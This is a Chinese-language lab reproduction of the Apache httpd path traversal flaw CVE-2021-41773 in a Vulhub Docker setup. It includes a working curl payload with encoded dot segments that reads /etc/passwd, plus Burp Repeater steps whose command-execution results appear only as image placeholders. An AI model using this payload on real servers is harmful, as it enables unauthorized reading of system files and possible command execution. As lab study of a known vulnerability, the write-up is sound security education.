目录穿越漏洞(CVE-2021-41773)复现

目录

漏洞描述

漏洞复现具体步骤:

用burp复现:

Get:

 Post:


漏洞描述

目录穿越比目录浏览、目录遍历更具破坏性,目录穿越不仅可以读取服务器中任何目录及任何文件的内容,还可以执行系统命令

漏洞等级:高危

影响版本:

Apache httpd 2.4.49-2.4.51

准备阶段:

 环境:win7虚拟机(装有BP) kali(装有最新的docker vulhub)

漏洞复现具体步骤:

1.进入Vulhub目录中启动存在漏洞的Apache 服务器

/home/kali/vulhub/httpd/CVE-2021-41773/

2.win7访问Apache 默认的It works!页面

目录穿越漏洞(CVE-2021-41773)复现_第1张图片

3.漏洞利用 

 使用如下CURL命令来发送Payload---/icons/必须是一个存在且可以访问的目录

curl -v --path-as-is http://192.168.132.10:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

目录穿越漏洞(CVE-2021-41773)复现_第2张图片

可以看到已经把当前系统里的/etc/passwd里的内容已经扫出来了

用burp复现:

Get:

http://192.168.132.10:8080/icons/ 将此url 在repeater里面右键改为request请求

点击send出现下图

 目录穿越漏洞(CVE-2021-41773)复现_第3张图片

将.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 拼接在后面

目录穿越漏洞(CVE-2021-41773)复现_第4张图片

 Post:

Id:

目录穿越漏洞(CVE-2021-41773)复现_第5张图片

Pwd:

目录穿越漏洞(CVE-2021-41773)复现_第6张图片

你可能感兴趣的:(安全漏洞,安全)